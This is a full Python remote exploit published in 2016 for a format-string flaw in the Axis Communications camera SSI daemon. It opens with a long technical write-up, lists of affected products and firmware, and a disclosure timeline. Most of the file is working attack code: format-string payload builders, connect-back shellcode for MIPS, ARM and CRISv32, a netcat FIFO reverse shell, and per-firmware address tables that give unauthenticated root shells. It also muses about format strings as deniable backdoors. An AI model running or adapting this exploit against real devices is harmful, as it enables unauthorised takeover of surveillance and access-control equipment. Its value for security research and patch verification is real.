#!/usr/bin/env python2.7 # # [SOF] # # [Remote Format String Exploit] Axis Communications MPQT/PACS Server Side Include (SSI) Daemon # Research and development by bashis <mcw noemail eu> 2016 # # This format string vulnerability has following characteristic: # - Heap Based (Exploiting string located on the heap) # - Blind Attack (No output the remote attacker)(*) # - Remotly exploitable (As anonymous, no credentials needed) # # (*) Not so 'Blind' after all, since the needed addresses can be predicted by statistic. # # This exploit has following characteristic: # - Multiple architecture exploit (MIPS/CRISv32/ARM) [From version 5.20.x] # - Modifying LHOST/LPORT in shellcode on the fly # - Manual exploiting of remote targets # - Simple HTTPS support # - Basic Authorization support (not needed for this exploit) # - FMS dictionary and predicted addresses for GOT free() / BSS / Netcat shellcode # - Multiple shellcodes (ARM, CRISv32, MIPS and Netcat PIPE shell) # - Exploiting with MIPS, CRISv32 and ARM shellcode will give shell as root # - Exploiting with ARM Netcat PIPE shell give normally shell as Anonymous (5.2x and 5.4x give shell as root) # - Multiple FMS exploit techniques # - "One-Write-Where-And-What" for MIPS and CRISv32 # Using "Old Style" POP's # Classic exploit using: Count to free() GOT, write shellcode address, jump to shellcode on free() call # Shellcode loaded in memory by sending shellcode URL encoded, that SSI daemon decodes and keeps in memory. # - "Two-Write-Where-And-What" for ARM # 1) "Old Style": Writing 1x LSB and 1x MSB by using offsets for GOT free() target address # 2) "New Style": ARM Arch's have both "Old Style" (>5.50.x) )POPs and "New Style" (<5.40.x) direct parameter access for POP/Write # [Big differnce in possibilities between "Old Style" and "New Style", pretty interesting actually] # - Another way to POP with "Old Style", to be able POPing with low as 1 byte (One byte with %1c instead of eight with %8x) # - Exploit is quite well documented # # Anyhow, # Everything started from this simple remote request: # # --- # $ echo -en "GET /httpDisabled.shtml?&http_user=%p|%p HTTP/1.0\n\n" | netcat 192.168.0.90 80 # HTTP/1.1 500 Server Error # Content-Type: text/html; charset=ISO-8859-1 # # <HTML><HEAD><TITLE>500 Server Error</TITLE></HEAD> # <BODY><H1>500 Server Error</H1> # The server encountered an internal error and could not complete your request. # </BODY></HTML> # --- # # Which gave this output in /var/log/messages on the remote device: # # --- # <CRITICAL> Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:635: getpwnam() failed for user: 0x961f0|0x3ac04b10 # <CRITICAL> Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:303: Failed to get authorization data. # --- # # Which resulted into an remote exploit for more than 200 unique Axis Communication MPQT/PACS products # # --- # $ netcat -vvlp 31337 # listening on [any] 31337 ... # 192.168.0.90: inverse host lookup failed: Unknown host # connect to [192.168.0.1] from (UNKNOWN) [192.168.0.90] 55738 # id # uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel),51(viewer),52(operator),53(admin),54(system),55(ptz) # pwd # /usr/html # --- # # Some technical notes: # # 1. Direct addressing with %<argument>$%n is "delayed", and comes in force only after disconnect. # Old metod with POP's coming into force instantly # # 2. Argument "0" will be assigned (after using old POP metod and %n WRITE) the next address on stack after POP's) # - Would be interesting to investigate why. # # 3. Normal Apache badbytes: 0x00, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x20, 0x23, 0x26 # Goodbytes: 0x01-0x08, 0x0e-0x1f, 0x21-0x22, 0x24-0x25, 0x27-0xff # # 3.1 Normal Boa badbytes: 0x00-0x08, 0x0b-0x0c, 0x0e-0x19, 0x80-0xff # Goodbytes: 0x09, 0x0a, 0x0d, 0x20-0x7f # # 3.2 Apache and Boa, by using URL encoded shellcode as in this exploit: # Badbytes = None, Goodbytes = 0x00 - 0xff (Yay!) # # 4. Everything is randomized, except heap. # # 5. My initial attempts to use ROP's was not good, as I didn't want to create # one unique FMS key by testing each single firmware version, and using ROP with FMS # on heap seems pretty complicated as there is one jump availible, maximum two. # # 5.1 Classic GOT write for free() that will jump to shellcode, was the best technique in this case. # # 6. Encoded and Decoded shellcode located in .bss section. # 6.1 FMS excecuted on heap # # 7. Vulnerable MPQT/PACS architectures: CRISv32, MIPS and ARM # 7.1 ARM has nonexecutable stack flag bit set (>5.20.x) by default on their binaries/libs, # so execute shellcode on heap/stack may be impossible. # 7.2 ARM shellcode and exploit has been verified by setting executable stack flag bit on binaries, # and re-compile of the image. # 7.3 However, ARM is easily exploitable with netcat shell, that's using the builtin '/bin/sh -c' code to execute. # # 8. This exploit are pretty well documented, more details can be extracted by reading # the code and comments. # # MIPS ssid maps # 00400000-0040d000 r-xp 00000000 00:01 2272 /bin/ssid # 0041d000-0041e000 rw-p 0000d000 00:01 2272 /bin/ssid # 0041e000-00445000 rwxp 00000000 00:00 0 [heap] # # ARM ssid maps # 00008000-00014000 r-xp 00000000 00:01 2055 /bin/ssid # 0001c000-0001d000 rw-p 0000c000 00:01 2055 /bin/ssid # 0001d000-00044000 rw-p 00000000 00:00 0 [heap] # # Crisv32 ssid maps # 00080000-0008c000 r-xp 00000000 1f:03 115 /bin/ssid # 0008c000-0008e000 rw-p 0000a000 1f:03 115 /bin/ssid # 0008e000-000b6000 rwxp 0008e000 00:00 0 [heap] # # General notes: # # When the vul daemon process is exploited, and after popping root connect-back shell, # the main process are usally restarted by respawnd, after the shell have spawned and taken over the parent process, # when the main process are fully alive again, I can enjoy the shell, and everybody else can # enjoy of the camera - that should make all of us happy ;) # During exploiting, logs says almost nothing, only that the main process restarted. # Note: Not true with ARM Netcat PIPE shell (as the code will vfork() and wait until child exits) # # '&http_user=' is the vuln tag, and the FMS will be excecuted when it will try to do vsyslog(), # after ssid cannot verify the user, free() are the closest function to be called after # vsyslog(), needed and perfect to use for jumping. # There is nothing shown for remote user, possible output of FMS are _only_ shown in log/console. # So we are pretty blind, but due to fixed FMS keys, that doesn't matter for us - it's predictable by statistics. # # Quite surprised to see so many different devices and under one major release version, # that's covered by one "FMS key". The "FMS key" are valid for all minor versions under the major version. # # This made me start thinking how brilliant and clever it would be to make an sophisticated door that's using format string as backdoor, # which generates no FMS output whatsoever to attacker and unlocked by a 'FMS key', instead of using hardcoded login/password. # # - No hardcoded login/password that could easily be found in firmware/software files. # - Extremely hard to find without local access (and find out what to trigger for opening the door) # - Nobody can not actually prove it is a sophisticated door for sure. "It's just another bug.. sorry! - here is the fixed version." # (Only to close this door, and open another door, somewhere else, in any binary - and try make it harder to find) # # Note: # I don't say that Axis Communication has made this hidden format string by this purpose. # I can only believe it was a really stupid mistake from Axis side, after I have seen one screen-dump of the CVS changelog of SSI Daemon, # and another screen-dump with the change made late 2009, from non-vulnerable to vulnerable, in the affected code of logerr(). # # Vulnerable and exploitable products # # A1001, A8004-VE, A9188, C3003, F34, F41, F44, M1124, M1124-E, M1125, M1125-E, M1145, M1145-L, M3006, # M3007, M3026, M3027, M3037, M7010, M7011, M7014, M7016, P1125, P1353, P1354, P1355, P1357, P1364, # P1365, P1405, P1405-E, P1405-LE, P1425-E, P1425-LE, P1427, P1427-E, P1435, P3214, P3214-V, P3215, # P3215-V, P3224, P3224-LVE, P3225-LV, P3353, P3354, P3363, P3364, P3364-L, P3365, P3367, P3384, # P3707-PE, P3904, P3904-R, P3905, P3915-R, P5414-E, P5415-E, P5514, P5514-E, P5515, P5515-E, P5624, # P5624-E, P5635-E, P7210, P7214, P7216, P7224, P8535, Q1602, Q1604, Q1614, Q1615, Q1635, Q1635-E, # Q1765-LE, Q1765-LE-PT, Q1775, Q1931-E, Q1931-E-PT, Q1932-E, Q1932-E-PT, Q1941-E, Q2901-E, Q2901-E-PT, # Q3504, Q3505, Q6000-E, Q6042, Q6042-C, Q6042-E, Q6042-S, Q6044, Q6044-C, Q6044-E, Q6044-S, Q6045, # Q6045-C, Q6045-E, Q6045-S, Q6114-E, Q6115-E, Q7411, Q7424-R, Q7436, Q8414, Q8414-LVS, Q8631-E, Q8632-E, # Q8665-E, Q8665-LE, V5914, V5915, M1054, M1103, M1104, M1113, M1114, M2014-E, M3014, M3113, M3114, M3203, # M3204, M5013, M5014, M7001, P12/M20, P1204, P1214, P1214-E, P1224-E, P1343, P1344, P1346, P1347, P2014-E, # P3301, P3304, P3343, P3344, P3346, P3346-E, P5512, P5512-E, P5522, P5522-E, P5532, P5532-E, P5534, P5534-E, # P5544, P8221, P8513, P8514, P8524, Q1755, Q1910, Q1921, Q1922, Q6032, Q6032-C, Q6032-E, Q6034, Q6034-C, # Q6034-E, Q6035, Q6035-C, Q6035-E, Q7401, Q7404, Q7406, Q7414, Q8721-E, Q8722-E, C, M1004-W, M1011, M1011-W, # M1013, M1014, M1025, M1031-W, M1033-W, M1034-W, M1143-L, M1144-L, M3004, M3005, M3011, M3024, M3024-L, # M3025, M3044-V, M3045-V, M3046-V, P1311, P1428-E, P7701, Q3709-PVE, Q3708-PVE, Q6128-E... and more # # http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt # # Firmware versions vulnerable to the SSI FMS exploit # # ('V.Vx' == The FMS key used in this exploit) # # Firmware Introduced CRISv32 MIPS ARM (no exec heap from >5.20.x) # 5.00.x 2008 - - no # 5.01.x 2008 no - no # 5.02.x 2008 no - - # 5.05.x 2009 no - - # 5.06.x 2009 no - - # 5.07.x 2009 no - no # 5.08.x 2010 no - - # 5.09.x 2010 no - - # 5.10.x 2009 no - - # 5.11.x 2010 no - - # 5.12.x 2010 no - - # 5.15.x 2010 no - - # 5.16.x 2010 no - - # 5.20.x 2010-2011 5.2x - 5.2x # 5.21.x 2011 5.2x - 5.2x # 5.22.x 2011 5.2x - - # 5.25.x 2011 5.2x - - # 5.40.x 2011 5.4x 5.4x 5.4x # 5.41.x 2012 5.4x - - # 5.50.x 2013 5.5x 5.5x 5.4x # 5.51.x 2013 - 5.4x - # 5.55.x 2013 - 5.5x 5.5x # 5.60.x 2014 - 5.6x 5.6x # 5.65.x 2014-2015 - 5.6x - # 5.70.x 2015 - 5.7x - # 5.75.x 2015 - 5.7x 5.7x # 5.80.x 2015 - 5.8x 5.8x # 5.81.x 2015 - 5.8x - # 5.85.x 2015 - 5.8x 5.8x # 5.90.x 2015 - 5.9x - # 5.95.x 2016 - 5.9x 5.8x # 6.10.x 2016 - 6.1x - # 6.15.x 2016 - - 6.1x # 6.20.x 2016 - 6.2x - # # Vendor URL's of still supported and affected products # # http://www.axis.com/global/en/products/access-control # http://www.axis.com/global/en/products/video-encoders # http://www.axis.com/global/en/products/network-cameras # http://www.axis.com/global/en/products/audio # # Axis Product Security # # product-security@axis.com # http://www.axis.com/global/en/support/product-security # http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt # http://www.axis.com/global/en/support/faq/FAQ116268 # # Timetable # # - Research and Development: 06/01/2016 - 01/06/2016 # - Sent vulnerability details to vendor: 05/06/2016 # - Vendor responce received: 06/06/2016 # - Vendor ACK of findings received: 07/06/2016 # - Vendor sent verification image: 13/06/2016 # - Confirmed that exploit do not work after vendors correction: 13/06/2016 # - Vendor informed about their service release(s): 29/06/2016 # - Sent vendor a copy of the (this) PoC exploit: 29/06/2016 # - Full Disclosure: 18/07/2016 # # Quote of the day: Never say "whoops! :o", always say "Ah, still interesting! :>" # # Have a nice day # /bashis # ##################################################################################### import sys import string import socket import time import argparse import urllib, urllib2, httplib import base64 import ssl import re class do_FMS: # POP = "%8x" # Old style POP's with 8 bytes per POP POP = "%1c" # Old style POP's with 1 byte per POP WRITElln = "%lln" # Write 8 bytes WRITEn = "%n" # Write 4 bytes WRITEhn = "%hn" # Write 2 bytes WRITEhhn = "%hhn" # Write 1 byte def __init__(self,targetIP,verbose): self.targetIP = targetIP self.verbose = verbose self.fmscode = "" # Mostly used internally in this function def Add(self, data): self.fmscode += data # 'New Style' Double word (8 bytes) def AddDirectParameterLLN(self, ADDR): self.Add('%') self.Add(str(ADDR)) self.Add('$lln') # 'New Style' Word (4 bytes) def AddDirectParameterN(self, ADDR): self.Add('%') self.Add(str(ADDR)) self.Add('$n') # 'New Style' Half word (2 bytes) def AddDirectParameterHN(self, ADDR): self.Add('%') self.Add(str(ADDR)) self.Add('$hn') # 'New Style' One Byte (1 byte) def AddDirectParameterHHN(self, ADDR): self.Add('%') self.Add(str(ADDR)) self.Add('$hhn') # Addressing def AddADDR(self, ADDR): self.Add('%') self.Add(str(ADDR)) self.Add('u') # 'Old Style' POP def AddPOP(self, size): if size != 0: self.Add(self.POP * size) # Normally only one will be sent, multiple is good to quick-check for any FMS # # 'Old Style' Double word (8 bytes) def AddWRITElln(self, size): self.Add(self.WRITElln * size) # 'Old Style' Word (4 bytes) def AddWRITEn(self, size): self.Add(self.WRITEn * size) # 'Old Style' Half word (2 bytes) def AddWRITEhn(self, size): self.Add(self.WRITEhn * size) # 'Old Style' One byte (1 byte) def AddWRITEhhn(self, size): self.Add(self.WRITEhhn * size) # Return the whole FMS string def FMSbuild(self): return self.fmscode class HTTPconnect: def __init__(self, host, proto, verbose, creds, noexploit): self.host = host self.proto = proto self.verbose = verbose self.credentials = creds self.noexploit = noexploit # Netcat remote connectback shell needs to have raw HTTP connection as we using special characters as '\t','$','`' etc.. def RAW(self, uri): # Connect-timeout in seconds timeout = 5 socket.setdefaulttimeout(timeout) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) tmp = self.host.split(':') HOST = tmp[0] PORT = int(tmp[1]) if self.verbose: print "[Verbose] Sending to:", HOST print "[Verbose] Port:", PORT print "[Verbose] URI:",uri s.connect((HOST, PORT)) s.send("GET %s HTTP/1.0\r\n\r\n" % uri) html = (s.recv(4096)) # We really do not care whats coming back # if html: # print "[i] Received:",html s.shutdown(3) s.close() return html def Send(self, uri): # The SSI daemon are looking for this, and opens a new FD (5), but this does'nt actually # matter for the functionality of this exploit, only for future references. headers = { 'User-Agent' : 'MSIE', } # Connect-timeout in seconds timeout = 5 socket.setdefaulttimeout(timeout) url = '%s://%s%s' % (self.proto, self.host, uri) if self.verbose: print "[Verbose] Sending:", url if self.proto == 'https': if hasattr(ssl, '_create_unverified_context'): print "[i] Creating SSL Default Context" ssl._create_default_https_context = ssl._create_unverified_context if self.credentials: Basic_Auth = self.credentials.split(':') if self.verbose: print "[Verbose] User:",Basic_Auth[0],"Password:",Basic_Auth[1] try: pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm() pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1]) auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr) opener = urllib2.build_opener(auth_handler) urllib2.install_opener(opener) except Exception as e: print "[!] Basic Auth Error:",e sys.exit(1) if self.noexploit and not self.verbose: print "[<] 204 Not Sending!" html = "Not sending any data" else: data = None req = urllib2.Request(url, data, headers) rsp = urllib2.urlopen(req) if rsp: print "[<] %s OK" % rsp.code html = rsp.read() return html class shellcode_db: def __init__(self,targetIP,verbose): self.targetIP = targetIP self.verbose = verbose def sc(self,target): self.target = target # Connect back shellcode # # CRISv32: Written by myself, no shellcode availible out on "The Internet" # NCSH: My PoC of netcat FIFO / PIPE reverese shell, w/o '-e' option and with $IFS as separators # MIPSel: Written by Jacob Holcomb (url encoded by me) # ARM: http://shell-storm.org/shellcode/files/shellcode-754.php # # Slightly modified syscall's MIPSel = string.join([ #close stdin "%ff%ff%04%28" #slti a0,zero,-1 "%a6%0f%02%24" #li v0,4006 "%4c%f7%f7%03" #syscall 0xdfdfd #close stdout "%11%11%04%28" #slti a0,zero,4369 "%a6%0f%02%24" #li v0,4006 "%4c%f7%f7%03" #syscall 0xdfdfd #close stderr "%fd%ff%0c%24" #li t4,-3 "%27%20%80%01" #nor a0,t4,zero "%a6%0f%02%24" #li v0,4006 "%4c%f7%f7%03" #syscall 0xdfdfd # socket AF_INET (2) "%fd%ff%0c%24" #li t4,-3 "%27%20%80%01" #nor a0,t4,zero "%27%28%80%01" #nor a1,t4,zero "%ff%ff%06%28" #slti a2,zero,-1 "%57%10%02%24" #li v0,4183 "%4c%f7%f7%03" #syscall 0xdfdfd # "%ff%ff%44%30" # andi $a0, $v0, 0xFFFF # # dup2 stdout "%c9%0f%02%24" #li v0,4041 "%4c%f7%f7%03" #syscall 0xdfdfd # # dup2 stderr "%c9%0f%02%24" #li v0,4041 "%4c%f7%f7%03" #syscall 0xdfdfd # # Port "PP1PP0%05%3c" "%01%ff%a5%34" # "%01%01%a5%20" #addi a1,a1,257 "%f8%ff%a5%af" #sw a1,-8(sp) # # IP "IP3IP4%05%3c" "IP1IP2%a5%34" # "%fc%ff%a5%af" #sw a1,-4(sp) "%f8%ff%a5%23" #addi a1,sp,-8 "%ef%ff%0c%24" #li t4,-17 "%27%30%80%01" #nor a2,t4,zero "%4a%10%02%24" #li v0,4170 "%4c%f7%f7%03" #syscall 0xdfdfd # "%62%69%08%3c" #lui t0,0x6962 "%2f%2f%08%35" #ori t0,t0,0x2f2f "%ec%ff%a8%af" #sw t0,-20(sp) "%73%68%08%3c" #lui t0,0x6873 "%6e%2f%08%35" #ori t0,t0,0x2f6e "%f0%ff%a8%af" #sw t0,-16(sp "%ff%ff%07%28" #slti a3,zero,-1 "%f4%ff%a7%af" #sw a3,-12(sp) "%fc%ff%a7%af" #sw a3,-4(sp "%ec%ff%a4%23" #addi a0,sp,-20 "%ec%ff%a8%23" #addi t0,sp,-20 "%f8%ff%a8%af" #sw t0,-8(sp) "%f8%ff%a5%23" #addi a1,sp,-8 "%ec%ff%bd%27" #addiu sp,sp,-20 "%ff%ff%06%28" #slti a2,zero,-1 "%ab%0f%02%24" #li v0,4011 (execve) "%4c%f7%f7%03" #syscall 0xdfdfd ], '') # Working netcat shell # - $PATH will locate 'mkfifo', 'nc' and 'rm' # - LHOST / LPORT will be changed on the fly later in the code # - 1) make FIFO, 2) netcat back to attacker with STDIN to /bin/sh, and PIPE STDOUT back to the remote via FIFO, 3) remove FIFO when exiting # - $IFS = <space><tab><newline> [By default, and we need <space> or <tab> as separator] # $ echo -n "$IFS" | hexdump -C # 00000000 20 09 0a # - $PS1 = $ [By default, and we need something to "comment" out our trailing FMS code from /bin/sh -c] # # '2>/tmp/s' (STDERR > FIFO) Don't work with $IFS as separator # # Working with Apache and Boa # NCSH = "mkfifo$IFS/tmp/s;nc$IFS-w$IFS\"5\"$IFS\"LHOST\"$IFS\"LPORT\"$IFS0</tmp/s|/bin/sh>/tmp/s\"$IFS\"2>/tmp/s;rm$IFS/tmp/s;$PS1" NCSH = "mkfifo$IFS/tmp/s;nc$IFS-w$IFS\"5\"$IFS\"LHOST\"$IFS\"LPORT\"$IFS0</tmp/s|/bin/sh>/tmp/s;rm$IFS/tmp/s;$PS1" ARMel = string.join([ # original: http://shell-storm.org/shellcode/files/shellcode-754.php # 32-bit instructions, enter thumb mode "%01%10%8f%e2" # add r1, pc, #1 "%11%ff%2f%e1" # bx r1 # 16-bit thumb instructions follow # # socket(2, 1, 0) "%02%20" #mov r0, #2 "%01%21" #mov r1, #1 "%92%1a" #sub r2, r2, r2 "%0f%02" #lsl r7, r1, #8 "%19%37" #add r7, r7, #25 "%01%df" #svc 1 # # connect(r0, &addr, 16) "%06%1c" #mov r6, r0 "%08%a1" #add r1, pc, #32 "%10%22" #mov r2, #16 "%02%37" #add r7, #2 "%01%df" #svc 1 # # dup2(r0, 0/1/2) "%3f%27" #mov r7, #63 "%02%21" #mov r1, #2 # #lb: "%30%1c" #mov r0, r6 "%01%df" #svc 1 "%01%39" #sub r1, #1 "%fb%d5" #bpl lb # # execve("/bin/sh", ["/bin/sh", 0], 0) "%05%a0" #add r0, pc, #20 "%92%1a" #sub r2, r2, r2 "%05%b4" #push {r0, r2} "%69%46" #mov r1, sp "%0b%27" #mov r7, #11 "%01%df" #svc 1 # "%c0%46" # .align 2 (NOP) "%02%00" # .short 0x2 (struct sockaddr) "PP1PP0" # .short 0x3412 (port: 0x1234) "IP1IP2IP3IP4" #.byte 192,168,57,1 (ip: 192.168.57.1) # .ascii "/bin/sh\0\0" "%2f%62%69%6e" # /bin "%2f%73%68%00%00" # /sh\x00\x00 "%00%00%00%00" "%c0%46" ], '') # Connect-back shell for Axis CRISv32 # Written by mcw noemail eu 2016 # CRISv32 = string.join([ #close(0) "%7a%86" # clear.d r10 "%5f%9c%06%00" # movu.w 0x6,r9 "%3d%e9" # break 13 #close(1) "%41%a2" # moveq 1,r10 "%5f%9c%06%00" # movu.w 0x6,r9 "%3d%e9" # break 13 #close(2) "%42%a2" # moveq 2,r10 "%5f%9c%06%00" # movu.w 0x6,r9 "%3d%e9" # break 13 # "%10%e1" # addoq 16,sp,acr "%42%92" # moveq 2,r9 "%df%9b" # move.w r9,[acr] "%10%e1" # addoq 16,sp,acr "%02%f2" # addq 2,acr #PORT "%5f%9ePP1PP0" # move.w 0xPP1PP0,r9 # "%df%9b" # move.w r9,[acr] "%10%e1" # addoq 16,sp,acr "%6f%96" # move.d acr,r9 "%04%92" # addq 4,r9 #IP "%6f%feIP1IP2IP3IP4" # move.d IP4IP3IP2IP1,acr "%e9%fb" # move.d acr,[r9] # #socket() "%42%a2" # moveq 2,r10 "%41%b2" # moveq 1,r11 "%7c%86" # clear.d r12 "%6e%96" # move.d $sp,$r9 "%e9%af" # move.d $r10,[$r9+] "%e9%bf" # move.d $r11,[$r9+] "%e9%cf" # move.d $r12,[$r9+] "%41%a2" # moveq 1,$r10 "%6e%b6" # move.d $sp,$r11 "%5f%9c%66%00" # movu.w 0x66,$r9 "%3d%e9" # break 13 # "%6a%96" # move.d $r10,$r9 "%0c%e1" # addoq 12,$sp,$acr "%ef%9b" # move.d $r9,[$acr] "%0c%e1" # addoq 12,$sp,$acr "%6e%96" # move.d $sp,$r9 "%10%92" # addq 16,$r9 "%6f%aa" # move.d [$acr],$r10 "%69%b6" # move.d $r9,$r11 "%50%c2" # moveq 16,$r12 # # connect() "%6e%96" # move.d $sp,$r9 "%e9%af" # move.d $r10,[$r9+] "%e9%bf" # move.d $r11,[$r9+] "%e9%cf" # move.d $r12,[$r9+] "%43%a2" # moveq 3,$r10 "%6e%b6" # move.d $sp,$r11 "%5f%9c%66%00" # movu.w 0x66,$r9 "%3d%e9" # break 13 # dup(0) already in socket #dup(1) "%6f%aa" # move.d [$acr],$r10 "%41%b2" # moveq 1,$r11 "%5f%9c%3f%00" # movu.w 0x3f,$r9 "%3d%e9" # break 13 # #dup(2) "%6f%aa" # move.d [$acr],$r10 "%42%b2" # moveq 2,$r11 "%5f%9c%3f%00" # movu.w 0x3f,$r9 "%3d%e9" # break 13 # #execve("/bin/sh",NULL,NULL) "%90%e2" # subq 16,$sp "%6e%96" # move.d $sp,$r9 "%6e%a6" # move.d $sp,$10 "%6f%0e%2f%2f%62%69" # move.d 69622f2f,$r0 "%e9%0b" # move.d $r0,[$r9] "%04%92" # addq 4,$r9 "%6f%0e%6e%2f%73%68" # move.d 68732f6e,$r0 "%e9%0b" # move.d $r0,[$r9] "%04%92" # addq 4,$r9 "%79%8a" # clear.d [$r9] "%04%92" # addq 4,$r9 "%79%8a" # clear.d [$r9] "%04%92" # addq 4,$r9 "%e9%ab" # move.d $r10,[$r9] "%04%92" # addq 4,$r9 "%79%8a" # clear.d [$r9] "%10%e2" # addq 16,$sp "%6e%f6" # move.d $sp,$acr "%6e%96" # move.d $sp,$r9 "%6e%b6" # move.d $sp,$r11 "%7c%86" # clear.d $r12 "%4b%92" # moveq 11,$r9 "%3d%e9" # break 13 ], '') if self.target == 'MIPSel': return MIPSel elif self.target == 'ARMel': return ARMel elif self.target == 'CRISv32': return CRISv32 elif self.target == 'NCSH1': return NCSH elif self.target == 'NCSH2': return NCSH else: print "[!] Unknown shellcode! (%s)" % str(self.target) sys.exit(1) class FMSdb: def __init__(self,targetIP,verbose): self.targetIP = targetIP self.verbose = verbose def FMSkey(self,target): self.target = target target_db = { #----------------------------------------------------------------------- # All pointing from free() GOT to shellcode on .bss (Except ARM with NCSH) #----------------------------------------------------------------------- # # Using POP format string, AKA 'Old Style' # # MPQT 'MIPS-5.85.x': [ 0x41f370, # Adjust to GOT free() address 0x420900, # .bss shellcode address 2, # 1st POP's 2, # 2nd POP's 'axi', # Aligns injected code 700, # How big buffer before shellcode 'MIPSel' # Shellcode type ], # MPQT 'MIPS-5.40.3': [ 0x41e41c, # Adjust to GOT free() address 0x4208cc, # .bss shellcode address 7, # 1st POP's 11, # 2nd POP's 'ax', # Aligns injected code 450, # How big buffer before shellcode 'MIPSel' # Shellcode type ], # MPQT 'MIPS-5.4x': [ 0x41e4cc, # Adjust to GOT free() address 0x42097c, # .bss shellcode address 7, # 1st POP's 11, # 2nd POP's 'ax', # Aligns injected code 450, # How big buffer before shellcode 'MIPSel' # Shellcode type ], # MPQT 'MIPS-5.5x': [ 0x41d11c, # Adjust to GOT free() address 0x41f728, # .bss shellcode address 5, # 1st POP's 15, # 2nd POP's 'axis', # Aligns injected code 700, # How big buffer before shellcode 'MIPSel' # Shellcode type ], # MPQT 'MIPS-5.55x': [ 0x41d11c, # Adjust to GOT free() address 0x41f728, # .bss shellcode address 11, # 1st POP's 9, # 2nd POP's 'axis', # Aligns injected code 700, # How big buffer before shellcode 'MIPSel' # Shellcode type ], # Shared with MPQT and PACS 'MIPS-5.6x': [ 0x41d048, # Adjust to GOT free() address 0x41f728, # .bss shellcode address 5, # 1st POP's 15, # 2nd POP's 'axis', # Aligns injected code 700, # How big buffer before shellcode 'MIPSel' # Shellcode type ], # MPQT 'MIPS-5.7x': [ 0x41d04c, # Adjust to GOT free() address 0x41f718, # .bss shellcode address 2, # 1st POP's 14, # 2nd POP's 'axis', # Aligns injected code 700, # How big buffer before shellcode 'MIPSel' # Shellcode type ], # MPQT 'MIPS-5.75x': [ 0x41c498, # Adjust to GOT free() address 0x41daf0, # .bss shellcode address 3, # 1st POP's 13, # 2nd POP's 'axi', # Aligns injected code 700, # How big buffer before shellcode 'MIPSel' # Shellcode type ], # Shared with MPQT and PACS 'MIPS-5.8x': [ 0x41d0c0, # Adjust to GOT free() address 0x41e740, # .bss shellcode address 3, # 1st POP's 13, # 2nd POP's 'axi', # Aligns injected code 700, # How big buffer before shellcode 'MIPSel' # Shellcode type ], # MPQT 'MIPS-5.9x': [ 0x41d0c0, # Adjust to GOT free() address 0x41e750, # .bss shellcode address 3, # 1st POP's 13, # 2nd POP's 'axi', # Aligns injected code 700, # How big buffer before shellcode 'MIPSel' # Shellcode type ], # MPQT 'MIPS-6.1x': [ 0x41c480, # Adjust to GOT free() address 0x41dac0, # .bss shellcode address 3, # 1st POP's 13, # 2nd POP's 'axi', # Aligns injected code 700, # How big buffer before shellcode 'MIPSel' # Shellcode type ], # MPQT 'MIPS-6.2x': [ 0x41e578, # Adjust to GOT free() address 0x41fae0, # .bss shellcode address 2, # 1st POP's 2, # 2nd POP's 'axi', # Aligns injected code 700, # How big buffer before shellcode 'MIPSel' # Shellcode type ], # MPQT 'MIPS-6.20x': [ 0x41d0c4, # Adjust to GOT free() address 0x41e700, # .bss shellcode address 3, # 1st POP's 13, # 2nd POP's 'axi', # Aligns injected code 700, # How big buffer before shellcode 'MIPSel' # Shellcode type ], # PACS 'MIPS-1.3x': [ 0x41e4cc, # Adjust to GOT free() address 0x420a78, # .bss shellcode address 7, # 1st POP's 11, # 2nd POP's 'axis', # Aligns injected code 700, # How big buffer before shellcode 'MIPSel' # Shellcode type ], # PACS 'MIPS-1.1x': [ 0x41e268, # Adjust to GOT free() address 0x420818, # .bss shellcode address 7, # 1st POP's 11, # 2nd POP's 'axis', # Aligns injected code 700, # How big buffer before shellcode 'MIPSel' # Shellcode type ], # # Tested with execstack to set executable stack flag bit on bin's and lib's # # These two 'Old Style' are not used in the exploit, but kept here as reference as they has been confirmed working. # # ARMel with bin/libs executable stack flag set with 'execstack' # MPQT 'ARM-5.50x': [ # 0x1c1b4, # Adjust to GOT free() address 0x1e7c8, # .bss shellcode address 93, # 1st POP's 1, # 2nd POP's 'axis', # Aligns injected code 700, # How big buffer before shellcode 'ARMel' # Shellcode type (ARMel) ], # ARMel with bin/libs executable stack flag set with 'execstack' # MPQT 'ARM-5.55x': [ # 0x1c15c, # Adjust to GOT free() address 0x1e834, # .bss shellcode address 59, # 1st POP's 80, # 2nd POP's 'axis', # Aligns injected code 800, # How big buffer before shellcode 'ARMel' # Shellcode type (ARMel) ], # # Using direct parameter access format string, AKA 'New Style' # # MPQT 'ARM-NCSH-5.20x': [ # AXIS P1311 5.20 (id=root) 0x1c1b4, # Adjust to GOT free() address 0x10178, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" 61, # 1st POP's 115, # 2nd POP's 143, # 3rd POP's 118, # 4th POP's 'NCSH2' # Shellcode type (Netcat Shell) ], # MPQT 'ARM-NCSH-5.2x': [ # 0x1c1b4, # Adjust to GOT free() address 0x1013c, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" 61, # 1st POP's 115, # 2nd POP's 143, # 3rd POP's 118, # 4th POP's 'NCSH2' # Shellcode type (Netcat Shell) ], # MPQT 'ARM-NCSH-5.4x': [ # 0x1c1b4, # Adjust to GOT free() address 0x101fc, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" 61, # 1st POP's 115, # 2nd POP's 143, # 3rd POP's 118, # 4th POP's 'NCSH2' # Shellcode type (Netcat Shell) ], # # Using POP format string, AKA 'Old Style' # # MPQT 'ARM-NCSH-5.5x': [ # 0x1c15c, # Adjust to GOT free() address 0xfdcc, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" 97, # 1st POP's 0, # 2nd POP's 41, # 3rd POP's 0, # 4th POP's 'NCSH1' # Shellcode type (Netcat Shell) ], # MPQT 'ARM-NCSH-5.6x': [ # 0x1c15c, # Adjust to GOT free() address 0xfcec, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" 97, # 1st POP's 0, # 2nd POP's 41, # 3rd POP's 0, # 4th POP's 'NCSH1' # Shellcode type 